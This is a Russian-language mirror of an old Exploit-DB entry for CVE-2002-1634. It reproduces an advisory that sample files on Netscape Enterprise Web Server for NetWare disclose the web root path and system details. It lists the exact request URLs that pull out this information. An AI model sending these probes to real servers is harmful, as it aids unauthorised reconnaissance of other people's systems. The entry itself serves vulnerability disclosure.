- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21488
- Проверка EDB
-
- Пройдено
- Автор
- PROCHECKUP
- Тип уязвимости
- REMOTE
- Платформа
- NOVELL
- CVE
- cve-2002-1634
- Дата публикации
- 2002-05-29
Код:
source: https://www.securityfocus.com/bid/4874/info
It has been reported that Netscape Enterprise Web Server may disclose path and system information to a remote user.
Netscape Enterprise Web Server for Netware contain several sample files which leak system information, this information can be obtained by remote users.
An attacker is able to send a request, for an affected sample file, that will cause the host to disclose the location of the web root path. Certain sample files will also reveal detailed system specific information.
http://webserver/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/test.jse
http://webserver/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
http://webserver/perl/samples/env.pl
http://webserver/perl/samples/lancgi.pl
http://webserver/perl/samples/volscgi.pl
http://webserver/perl/samples/ndslogin.pl
http://webserver/netbasic/websinfo.bas- Источник
- www.exploit-db.com
